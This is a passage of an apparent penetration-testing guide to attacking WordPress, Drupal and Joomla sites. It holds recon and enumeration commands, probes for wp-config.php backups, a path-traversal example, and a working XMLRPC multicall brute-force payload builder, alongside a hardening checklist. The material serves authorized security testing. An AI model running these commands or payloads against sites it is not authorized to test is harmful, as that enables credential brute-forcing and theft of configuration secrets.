  if [ "$code" != "404" ]; then
    echo "[+] Component: $comp → $code"
  fi
done

# Admin panel
curl -s https://target.com/administrator/

# Configuration files
curl -s https://target.com/configuration.php~ -o /dev/null -w "%{http_code}"
curl -s https://target.com/configuration.php.bak -o /dev/null -w "%{http_code}"
5. Plugin Vulnerability Research
# WordPress plugin vulnerabilities
# WPVulnDB (wpscan.com/api)
wpscan --url https://target.com -e vp --api-token $WPSCAN_TOKEN

# searchsploit for known exploits
searchsploit wordpress plugin_name
searchsploit drupal module_name
searchsploit joomla component_name

# CVE databases
#   NVD:        https://nvd.nist.gov
#   WPScan DB:  https://wpscan.com/plugins
#   Patchstack: https://patchstack.com/database

# Nuclei CMS templates
nuclei -u https://target.com -t cves/wordpress/
nuclei -u https://target.com -t cves/drupal/
nuclei -u https://target.com -t cves/joomla/

# Manual vulnerability checks
# Check plugin version, then compare with known vulnerable versions
curl -s https://target.com/wp-content/plugins/PLUGIN/readme.txt | grep "Stable tag"

# Common high-value WordPress plugin vulnerabilities:
#   Contact Form 7         - File upload bypass
#   Elementor              - RCE, XSS
#   WooCommerce            - SQLi, auth bypass
#   Yoast SEO              - SQLi
#   All In One SEO         - SQLi, privilege escalation
#   WPForms                - SQLi
#   Wordfence              - auth bypass (ironic)
#   UpdraftPlus            - backup download without auth
#   Advanced Custom Fields - XSS
#   Gravity Forms          - file upload, injection
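"Compare with known vulnerable versions" is a version-order comparison, which GNU `sort -V` handles correctly (so `5.4.10` sorts after `5.4.2`). A sketch of a helper for that comparison — the version numbers in the demo are made up, not from a real advisory:

```shell
# Return success (exit 0) if the detected version is strictly older than
# the version the advisory says the bug was fixed in
is_vulnerable() {
  detected="$1"
  fixed_in="$2"
  # sort -V orders versions numerically component by component;
  # if detected sorts first and differs from fixed_in, it is older
  lowest=$(printf '%s\n%s\n' "$detected" "$fixed_in" | sort -V | head -1)
  [ "$lowest" = "$detected" ] && [ "$detected" != "$fixed_in" ]
}

# Demo with hypothetical versions
if is_vulnerable "5.4.1" "5.4.2"; then echo "5.4.1: vulnerable"; fi
if ! is_vulnerable "5.4.2" "5.4.2"; then echo "5.4.2: patched"; fi
```

Feed it the version scraped from `readme.txt` ("Stable tag") and the fixed-in version from the advisory database entry.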
6. Theme Analysis
# WordPress theme analysis

# Identify active theme
curl -s https://target.com | grep -oP 'wp-content/themes/\K[^/]+' | head -1

# Check theme version
curl -s "https://target.com/wp-content/themes/THEME/style.css" | head -20 | grep -i version

# Look for theme editor access
curl -s "https://target.com/wp-admin/theme-editor.php" -o /dev/null -w "%{http_code}"

# Child theme detection
curl -s https://target.com | grep -oP 'wp-content/themes/\K[^/]+' | sort -u

# Known vulnerable themes
searchsploit wordpress theme THEME_NAME
nuclei -u https://target.com -tags wordpress-themes

# Theme file inclusion vulnerabilities
# Many themes include files based on user input, e.g.:
#   /wp-content/themes/theme/download.php?file=../../../wp-config.php
7. CMS Configuration Analysis
# WordPress configuration exposure
# wp-config.php backup files
for ext in .bak .old .orig .save .swp .swo .txt .tmp '~'; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/wp-config.php${ext}" 2>/dev/null)
  if [ "$code" = "200" ]; then
    echo "[CRITICAL] wp-config.php${ext} is accessible!"
  fi
done

# WordPress debug log
curl -s https://target.com/wp-content/debug.log 2>/dev/null | head -20

# WordPress uploads directory listing
curl -s https://target.com/wp-content/uploads/ -o /dev/null -w "%{http_code}"
curl -s https://target.com/wp-content/uploads/2024/ -o /dev/null -w "%{http_code}"

# Common CMS misconfigurations:
#  1. Directory listing enabled in /wp-content/uploads/
#  2. Debug mode enabled in production
#  3. Default admin credentials
#  4. Exposed configuration backups
#  5. XMLRPC enabled (brute force, DDoS amplification)
#  6. User registration open when it shouldn't be
#  7. File editing enabled in admin
#  8. Weak admin password
#  9. Outdated core/plugins/themes
# 10. Exposed admin panel without 2FA
8. CMS-Specific Attack Vectors
# WordPress attacks:

# 1. XMLRPC brute force
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password123</value></param></params></methodCall>'

# 2. XMLRPC multicall (amplified brute force)
#    Send multiple login attempts in a single request
# 3. REST API user enumeration
curl -s https://target.com/wp-json/wp/v2/users
# 4. WordPress arbitrary file deletion (CVE-2018-12895)
# 5. WordPress RCE via plugin/theme editor
# 6. WordPress XXE via Media Upload

# Drupal attacks:
# 1. Drupalgeddon2 (CVE-2018-7600)
# 2. Registration form manipulation
# 3. Admin panel brute force
# 4. Module-specific vulnerabilities

# Joomla attacks:
# 1. Component injection (com_*)
# 2. Admin panel brute force
# 3. Configuration file exposure
# 4. Registration exploitation
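The multicall technique works by wrapping many `wp.getUsersBlogs` calls inside one `system.multicall` request, so one HTTP round trip tests many passwords. A sketch of the payload builder — the credentials are placeholders, and as always, only use this against systems you are authorized to test:

```shell
# Build a system.multicall body that packs one wp.getUsersBlogs login
# attempt per password into a single XML-RPC request
build_multicall() {
  user="$1"; shift
  printf '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data>'
  for pass in "$@"; do
    printf '<value><struct><member><name>methodName</name><value>wp.getUsersBlogs</value></member><member><name>params</name><value><array><data><value>%s</value><value>%s</value></data></array></value></member></struct></value>' "$user" "$pass"
  done
  printf '</data></array></value></param></params></methodCall>\n'
}

# Two guesses for one user, in one request body
build_multicall admin password123 letmein > /tmp/multicall.xml
# Send it (placeholder target):
# curl -s -X POST https://target.com/xmlrpc.php -H "Content-Type: text/xml" --data @/tmp/multicall.xml
```

Responses contain one result per inner call; a struct with a blog list instead of a `faultCode` marks a valid credential pair.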
9. CMS Hardening Check
# WordPress hardening checklist:
[ ] WordPress core updated to latest
[ ] All plugins updated
[ ] All themes updated
[ ] Unused plugins/themes removed
[ ] XMLRPC disabled
[ ] File editing disabled (DISALLOW_FILE_EDIT)
[ ] Debug mode off in production
[ ] Strong admin password
[ ] Admin username not "admin"
[ ] User enumeration blocked
[ ] wp-config.php protected
[ ] uploads directory secured
[ ] Security headers configured
[ ] Two-factor authentication enabled
[ ] Login rate limiting active
[ ] Regular backups configured
[ ] File integrity monitoring
[ ] WAF/security plugin installed
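A few of the checklist items (file editing disabled, debug mode off) can be verified from a local copy of wp-config.php. A grep-based sketch: the sample file and the patterns are illustrative and will miss unusual formatting such as double quotes or extra whitespace.

```shell
# Mock wp-config.php fragment for the demo
cat > /tmp/wp-config-sample.php <<'EOF'
define('DISALLOW_FILE_EDIT', true);
define('WP_DEBUG', false);
EOF

# Check two hardening items against a wp-config.php copy
audit_wp_config() {
  cfg="$1"
  if grep -q "DISALLOW_FILE_EDIT'[^)]*true" "$cfg"; then
    echo "file editing disabled: OK"
  else
    echo "file editing disabled: MISSING"
  fi
  if grep -q "WP_DEBUG'[^)]*true" "$cfg"; then
    echo "debug mode: ENABLED (fix for production)"
  else
    echo "debug mode: off OK"
  fi
}

audit_wp_config /tmp/wp-config-sample.php
```

The same pattern extends to other constants worth checking, e.g. `DISALLOW_FILE_MODS` or `FORCE_SSL_ADMIN`.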
10. CMS Enumeration Script
#!/bin/bash
# cms_enum.sh
TARGET=$1
OUTDIR="recon/${TARGET}/cms"
mkdir -p "$OUTDIR"

echo "=== CMS Enumeration: $TARGET ==="

# Detect CMS
echo "[1/4] Detecting CMS..."
whatweb -a 3 "https://$TARGET" > "$OUTDIR/whatweb.txt" 2>/dev/null

# Check each CMS
WP=$(curl -s "https://$TARGET/wp-login.php" -o /dev/null -w "%{http_code}" 2>/dev/null)
DRUPAL=$(curl -s "https://$TARGET/user/login" -o /dev/null -w "%{http_code}" 2>/dev/null)
JOOMLA=$(curl -s "https://$TARGET/administrator/" -o /dev/null -w "%{http_code}" 2>/dev/null)

# WordPress scan
if [ "$WP" = "200" ] || grep -qi "wordpress" "$OUTDIR/whatweb.txt" 2>/dev/null; then
  echo "[+] WordPress detected!"
  echo "[2/4] Running WPScan..."
  wpscan --url "https://$TARGET" -e ap,at,u --no-banner -o "$OUTDIR/wpscan.txt" 2>/dev/null
  # Additional checks
  curl -s "https://$TARGET/wp-json/wp/v2/users" | jq '.[].slug' > "$OUTDIR/wp_users.txt" 2>/dev/null
  curl -s "https://$TARGET/wp-content/debug.log" > "$OUTDIR/debug_log.txt" 2>/dev/null
fi

# Drupal scan
if [ "$DRUPAL" = "200" ] || grep -qi "drupal" "$OUTDIR/whatweb.txt" 2>/dev/null; then
  echo "[+] Drupal detected!"
  echo "[2/4] Running Droopescan..."
  droopescan scan drupal -u "https://$TARGET" > "$OUTDIR/droopescan.txt" 2>/dev/null
fi

# Joomla scan
if [ "$JOOMLA" = "200" ] || grep -qi "joomla" "$OUTDIR/whatweb.txt" 2>/dev/null; then
  echo "[+] Joomla detected!"
  echo "[2/4] Running JoomScan..."
  joomscan -u "https://$TARGET" > "$OUTDIR/joomscan.txt" 2>/dev/null
fi

# Nuclei CMS scans
echo "[3/4] Nuclei CMS scan..."
nuclei -u "https://$TARGET" -t cves/wordpress/ -t cves/drupal/ -t cves/joomla/ \
  -silent -o "$OUTDIR/nuclei_cms.txt" 2>/dev/null

echo "[4/4] Complete. Results in $OUTDIR/"